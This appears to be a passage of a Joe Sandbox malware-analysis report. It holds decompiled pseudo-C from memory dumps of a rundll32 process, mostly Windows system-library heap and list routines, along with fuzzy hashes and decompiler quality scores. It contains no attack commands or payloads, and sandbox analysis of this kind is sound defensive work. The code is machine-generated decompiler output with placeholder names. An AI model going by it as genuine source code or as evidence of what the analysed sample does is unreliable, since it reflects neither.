                                                                                                                C-Code - Quality: 67%
                                                                                                                			E044D070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v11;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v15;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* __ebx;
                                                                                                                				char* _t32;
                                                                                                                				signed int* _t38;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_t38 = __ecx;
                                                                                                                				_v16 = __edx;
                                                                                                                				_t60 = E044D07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                                                				if(_t60 != 0) {
                                                                                                                					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                                                					_push( *_t7);
                                                                                                                					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                                                					_push( *_t9);
                                                                                                                					_v12 = _a8 << 0xc;
                                                                                                                					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                                                					_push(0x4000);
                                                                                                                					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                                                					E044CAFDE( &_v8,  &_v12);
                                                                                                                					E044D1293(_t38, _v28, _t60);
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t32 = 0x7ffe0380;
                                                                                                                					} else {
                                                                                                                						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                					}
                                                                                                                					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                                                						E044C14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return  ~_t60;
                                                                                                                			}














                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction ID: 5330d2fe456682673f0923c3e133afcd4da43c9812eb1b630f9727f8dcfe96b3
                                                                                                                • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                • Instruction Fuzzy Hash: B92104362042049FDB15DF18C890B6BBBA5EFC4354F04856EF9959F382D730E909CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E0442AE73(intOrPtr __ecx, void* __edx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* _t19;
                                                                                                                				char* _t22;
                                                                                                                				signed char* _t24;
                                                                                                                				intOrPtr _t25;
                                                                                                                				intOrPtr _t27;
                                                                                                                				void* _t31;
                                                                                                                				intOrPtr _t36;
                                                                                                                				char* _t38;
                                                                                                                				signed char* _t42;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t31 = __edx;
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t19 = E04427D50();
                                                                                                                				_t38 = 0x7ffe0384;
                                                                                                                				if(_t19 != 0) {
                                                                                                                					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                				} else {
                                                                                                                					_t22 = 0x7ffe0384;
                                                                                                                				}
                                                                                                                				_t42 = 0x7ffe0385;
                                                                                                                				if( *_t22 != 0) {
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t24 = 0x7ffe0385;
                                                                                                                					} else {
                                                                                                                						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                					}
                                                                                                                					if(( *_t24 & 0x00000010) != 0) {
                                                                                                                						goto L17;
                                                                                                                					} else {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					_t27 = E04427D50();
                                                                                                                					if(_t27 != 0) {
                                                                                                                						_t27 =  *[fs:0x30];
                                                                                                                						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                                                                					}
                                                                                                                					if( *_t38 != 0) {
                                                                                                                						_t27 =  *[fs:0x30];
                                                                                                                						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						_t27 = E04427D50();
                                                                                                                						if(_t27 != 0) {
                                                                                                                							_t27 =  *[fs:0x30];
                                                                                                                							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                                                                						}
                                                                                                                						if(( *_t42 & 0x00000020) != 0) {
                                                                                                                							L17:
                                                                                                                							_t25 = _v8;
                                                                                                                							_t36 = 0;
                                                                                                                							if(_t25 != 0) {
                                                                                                                								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                                                                							}
                                                                                                                							_t27 = E04487794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                                                                						}
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						L5:
                                                                                                                						return _t27;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E04487794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _t21;
                                                                                                                				void* _t24;
                                                                                                                				intOrPtr _t25;
                                                                                                                				void* _t36;
                                                                                                                				short _t39;
                                                                                                                				signed char* _t42;
                                                                                                                				unsigned int _t46;
                                                                                                                				void* _t50;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t21 =  *0x44f7b9c; // 0x0
                                                                                                                				_t46 = _a8;
                                                                                                                				_v12 = __edx;
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t4 = _t46 + 0x2e; // 0x2e
                                                                                                                				_t36 = _t4;
                                                                                                                				_t24 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                                                                				_t50 = _t24;
                                                                                                                				if(_t50 != 0) {
                                                                                                                					_t25 = _a4;
                                                                                                                					if(_t25 == 5) {
                                                                                                                						L3:
                                                                                                                						_t39 = 0x14b1;
                                                                                                                					} else {
                                                                                                                						_t39 = 0x14b0;
                                                                                                                						if(_t25 == 6) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((short*)(_t50 + 6)) = _t39;
                                                                                                                					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                                                                					_t11 = _t50 + 0x2c; // 0x2c
                                                                                                                					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                                                                					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                                                                					E0444F3E0(_t11, _a12, _t46);
                                                                                                                					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t42 = 0x7ffe0384;
                                                                                                                					} else {
                                                                                                                						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                					}
                                                                                                                					_push(_t50);
                                                                                                                					_t19 = _t36 - 0x20; // 0xe
                                                                                                                					_push(0x403);
                                                                                                                					_push( *_t42 & 0x000000ff);
                                                                                                                					E04449AE0();
                                                                                                                					_t24 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                                                                				}
                                                                                                                				return _t24;
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0443FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* _t19;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr _t32;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr* _t40;
                                                                                                                
                                                                                                                				_t35 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t37 = 0;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t29 = __ecx;
                                                                                                                				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                                                                					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                                                                					L3:
                                                                                                                					_t19 = _a4 - 4;
                                                                                                                					if(_t19 != 0) {
                                                                                                                						if(_t19 != 1) {
                                                                                                                							L7:
                                                                                                                							return _t37;
                                                                                                                						}
                                                                                                                						if(_t35 == 0) {
                                                                                                                							L11:
                                                                                                                							_t37 = 0xc000000d;
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                                                                							_t35 = _v8;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					if(_t29 == 0) {
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t32 =  *_t40;
                                                                                                                					if(_t32 != 0) {
                                                                                                                						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                                                                						E044176E2( *_t40);
                                                                                                                					}
                                                                                                                					 *_t40 = _t29;
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				_t40 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                                                                				if(_t40 == 0) {
                                                                                                                					_t37 = 0xc0000017;
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				_t35 = _v8;
                                                                                                                				 *_t40 = 0;
                                                                                                                				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                                                				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                                                                				goto L3;
                                                                                                                			}











                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction ID: b669239bb6aae13467fc4dfa9614b308f55c92613f07914d6fd610a4deedfdd9
                                                                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                • Instruction Fuzzy Hash: 32217C72A00640DFDB31CF4AC644A66B7E5EB98F11F24816FE94687B11E734BC05DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E04409240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t41;
                                                                                                                				intOrPtr* _t46;
                                                                                                                				void* _t48;
                                                                                                                				intOrPtr _t50;
                                                                                                                				intOrPtr* _t60;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr _t62;
                                                                                                                				intOrPtr _t65;
                                                                                                                				void* _t66;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x44df708);
                                                                                                                				E0445D08C(__ebx, __edi, __esi);
                                                                                                                				_t65 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                                                				if( *(__ecx + 0x24) != 0) {
                                                                                                                					_push( *(__ecx + 0x24));
                                                                                                                					E044495D0();
                                                                                                                					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                                                				}
                                                                                                                				L6();
                                                                                                                				L6();
                                                                                                                				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                                                				E044495D0();
                                                                                                                				_t33 =  *0x44f84c4; // 0x0
                                                                                                                				L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                                                				_t37 =  *0x44f84c4; // 0x0
                                                                                                                				L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                                                				_t41 =  *0x44f84c4; // 0x0
                                                                                                                				E04422280(L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x44f86b4);
                                                                                                                				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                                				_t46 = _t65 + 0xe8;
                                                                                                                				_t62 =  *_t46;
                                                                                                                				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                                                				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                                                					_t61 = 3;
                                                                                                                					asm("int 0x29");
                                                                                                                					_push(_t65);
                                                                                                                					_t66 = _t61;
                                                                                                                					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                                                					_push( *_t23);
                                                                                                                					E044495D0();
                                                                                                                					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                                                					_push( *_t24);
                                                                                                                					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                                                					_t48 = E044495D0();
                                                                                                                					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                                                					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                                                					return _t48;
                                                                                                                				} else {
                                                                                                                					 *_t60 = _t62;
                                                                                                                					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                                                					 *(_t68 - 4) = 0xfffffffe;
                                                                                                                					E04409325();
                                                                                                                					_t50 =  *0x44f84c4; // 0x0
                                                                                                                					return E0445D0D1(L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                                                				}
                                                                                                                			}
















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8959ee18cc0d0f200f3730e3b4ea42a8eb968e08e99eac551f8b9ac3452e0324
                                                                                                                • Instruction ID: 40186fab7eac15753aafa49586423de25510731b993383468bdafd1ad1189111
                                                                                                                • Opcode Fuzzy Hash: 8959ee18cc0d0f200f3730e3b4ea42a8eb968e08e99eac551f8b9ac3452e0324
                                                                                                                • Instruction Fuzzy Hash: A1213971041600DFEB21EF29CA00B56B7B9FF18708F14866EA109866A2DB34F951CB44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 54%
                                                                                                                			E0443B390(void* __ecx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed char _t12;
                                                                                                                				signed int _t16;
                                                                                                                				signed int _t21;
                                                                                                                				void* _t28;
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t41;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t41 = _a4 + 0xffffffb8;
                                                                                                                				E04422280(_t12, 0x44f8608);
                                                                                                                				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                                                                				asm("sbb edi, edi");
                                                                                                                				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                                                				_v8 = _t36;
                                                                                                                				asm("lock cmpxchg [ebx], ecx");
                                                                                                                				_t30 = 1;
                                                                                                                				if(1 != 1) {
                                                                                                                					while(1) {
                                                                                                                						_t21 = _t30 & 0x00000006;
                                                                                                                						_t16 = _t30;
                                                                                                                						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                                                						asm("lock cmpxchg [edi], esi");
                                                                                                                						if(_t16 == _t30) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t30 = _t16;
                                                                                                                					}
                                                                                                                					_t36 = _v8;
                                                                                                                					if(_t21 == 2) {
                                                                                                                						_t16 = E044400C2(0x44f8608, 0, _t28);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t36 != 0) {
                                                                                                                					_t16 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                                                				}
                                                                                                                				return _t16;
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1a293c2519cf1a989cf7fecc9ff52e51173f0fd41cb73550d4bb1717e966c6d
                                                                                                                • Instruction ID: a1dd672e5f1f2a784d1c226ee8fd4fdb4bf33fdb490020a55497003b2bbd72cf
                                                                                                                • Opcode Fuzzy Hash: e1a293c2519cf1a989cf7fecc9ff52e51173f0fd41cb73550d4bb1717e966c6d
                                                                                                                • Instruction Fuzzy Hash: 471148333051209BEF299E258D81A6B7256EBC9730B24012FDA16DB381DE35BC02C691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E04494257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t18;
                                                                                                                				intOrPtr _t24;
                                                                                                                				intOrPtr* _t27;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t31;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t37;
                                                                                                                				void* _t38;
                                                                                                                				void* _t39;
                                                                                                                				void* _t43;
                                                                                                                
                                                                                                                				_t39 = __eflags;
                                                                                                                				_t35 = __edi;
                                                                                                                				_push(8);
                                                                                                                				_push(0x44e08d0);
                                                                                                                				E0445D08C(__ebx, __edi, __esi);
                                                                                                                				_t37 = __ecx;
                                                                                                                				E044941E8(__ebx, __edi, __ecx, _t39);
                                                                                                                				E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                                                				_t18 = _t37 + 8;
                                                                                                                				_t33 =  *_t18;
                                                                                                                				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                                                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                                                					L8:
                                                                                                                					_push(3);
                                                                                                                					asm("int 0x29");
                                                                                                                				} else {
                                                                                                                					 *_t27 = _t33;
                                                                                                                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                                                					_t35 = 0x44f87e4;
                                                                                                                					_t18 =  *0x44f87e0; // 0x0
                                                                                                                					while(_t18 != 0) {
                                                                                                                						_t43 = _t18 -  *0x44f5cd0; // 0xffffffff
                                                                                                                						if(_t43 >= 0) {
                                                                                                                							_t31 =  *0x44f87e4; // 0x0
                                                                                                                							_t18 =  *_t31;
                                                                                                                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								 *0x44f87e4 = _t18;
                                                                                                                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                                                								L04407055(_t31 + 0xfffffff8);
                                                                                                                								_t24 =  *0x44f87e0; // 0x0
                                                                                                                								_t18 = _t24 - 1;
                                                                                                                								 *0x44f87e0 = _t18;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L9:
                                                                                                                				__eflags =  *0x44f5cd0;
                                                                                                                				if( *0x44f5cd0 <= 0) {
                                                                                                                					L04407055(_t37);
                                                                                                                				} else {
                                                                                                                					_t30 = _t37 + 8;
                                                                                                                					_t34 =  *0x44f87e8; // 0x0
                                                                                                                					__eflags =  *_t34 - _t35;
                                                                                                                					if( *_t34 != _t35) {
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						 *_t30 = _t35;
                                                                                                                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                                                						 *_t34 = _t30;
                                                                                                                						 *0x44f87e8 = _t30;
                                                                                                                						 *0x44f87e0 = _t18 + 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t38 - 4) = 0xfffffffe;
                                                                                                                				return E0445D0D1(L04494320());
                                                                                                                			}
















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09138de35c17ca446ba492c46df6b474d3ec2bdc72a3e9c1b0c1bf47122a33af
                                                                                                                • Instruction ID: 6357584eaa9ee6bb324536dfe3780b8450b7ab07fbdc102ca24e7b2757e3f3b8
                                                                                                                • Opcode Fuzzy Hash: 09138de35c17ca446ba492c46df6b474d3ec2bdc72a3e9c1b0c1bf47122a33af
                                                                                                                • Instruction Fuzzy Hash: E7213870605A01DFEF28EF66D900615FBE1FB45358B20826FC1158F291EB39BC52DB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E044846A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                                                				signed short* _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				signed int _t22;
                                                                                                                				signed char _t23;
                                                                                                                				short _t32;
                                                                                                                				void* _t38;
                                                                                                                				char* _t40;
                                                                                                                
                                                                                                                				_v12 = __edx;
                                                                                                                				_t29 = 0;
                                                                                                                				_v8 = __ecx;
                                                                                                                				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                                                				_t38 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                                                				if(_t38 != 0) {
                                                                                                                					_t40 = _a4;
                                                                                                                					 *_t40 = 1;
                                                                                                                					E0444F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                                					_t22 = _v12 >> 1;
                                                                                                                					_t32 = 0x2e;
                                                                                                                					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                                                					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                                                					_t23 = E0443D268(_t38, 1);
                                                                                                                					asm("sbb al, al");
                                                                                                                					 *_t40 =  ~_t23 + 1;
                                                                                                                					L044277F0(_v16, 0, _t38);
                                                                                                                				} else {
                                                                                                                					 *_a4 = 0;
                                                                                                                					_t29 = 0xc0000017;
                                                                                                                				}
                                                                                                                				return _t29;
                                                                                                                			}












                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction ID: 9f2099cde6c0aed08c823fb7001e2aac133161561e2aab86402bdea907a4f7a9
                                                                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                • Instruction Fuzzy Hash: 95112572904208BBDB019F5DD8808BEB7B9EF95304F10806EF944C7351DA31AE55D7A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 34%
                                                                                                                			E04432397(intOrPtr _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t11;
                                                                                                                				void* _t19;
                                                                                                                				void* _t25;
                                                                                                                				void* _t26;
                                                                                                                				intOrPtr _t27;
                                                                                                                				void* _t28;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                                                                				if( *0x44f848c != 0) {
                                                                                                                					L0442FAD0(0x44f8610);
                                                                                                                					if( *0x44f848c == 0) {
                                                                                                                						E0442FA00(0x44f8610, _t19, _t27, 0x44f8610);
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						_push(0);
                                                                                                                						_push(_a4);
                                                                                                                						_t26 = 4;
                                                                                                                						_t29 = E04432581(0x44f8610, 0x43e50a0, _t26, _t27, _t28);
                                                                                                                						E0442FA00(0x44f8610, 0x43e50a0, _t27, 0x44f8610);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					_t11 =  *0x44f8614; // 0x1
                                                                                                                					if(_t11 == 0) {
                                                                                                                						_t11 = E04444886(0x43e1088, 1, 0x44f8614);
                                                                                                                					}
                                                                                                                					_push(0);
                                                                                                                					_push(_a4);
                                                                                                                					_t25 = 4;
                                                                                                                					_t29 = E04432581(0x44f8610, (_t11 << 4) + 0x43e5070, _t25, _t27, _t28);
                                                                                                                				}
                                                                                                                				if(_t29 != 0) {
                                                                                                                					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                                                                					 *((char*)(_t29 + 0x40)) = 0;
                                                                                                                				}
                                                                                                                				return _t29;
                                                                                                                			}
















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
